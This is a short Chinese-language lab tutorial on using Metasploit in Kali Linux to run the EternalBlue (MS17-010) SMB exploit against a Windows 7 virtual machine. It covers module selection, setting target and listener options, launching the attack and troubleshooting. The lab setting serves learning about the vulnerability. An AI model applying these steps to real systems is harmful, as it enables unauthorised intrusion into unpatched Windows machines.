kali永恒之蓝

kali下载地址:https://www.kali.org/
win7镜像下载地址链接：https://pan.baidu.com/s/1ZE1ZDluxZVVk3NOINQpgkQ?pwd=6666
密码:6666
Vmware下载地址https://www.vmware.com/cn.html

永恒之蓝

1.输入sudo su进入root模式 密码默认为kali

2.进入msfconsole

3.这边有二种方法查找永恒之蓝

第一种已知直接写
use exploit/windows/smb/ms17_010_eternalblue

第二种微软把永恒之蓝设置编号为2017年第10个漏洞
search ms17_010
查看完成之后发现编号为0
use 0

4.查看必选项

show options
标记的为yes必须修改的选项
RHOSTS为被攻击对象
PRORTSMBDomain为端口默认为445

Payload options是载荷的意思 后面为默认载荷
LHOST为kali的ip地址
LPORT端口选择一个不占用的即可

5.查看win7地址

win+R打开 输入cmd 在命令行里面输入ipconfig查看ip地址

6.设置必选项

7.运行模块

攻击成功
可以help查看有什么好玩的东西

8.为什么运行不超过

win7防火墙是否关闭
kali和win7地址是否在同一个网段？是否可以互相ping通？
查看show options RHOSTS是否是win7的ip地址？是否端口被占用？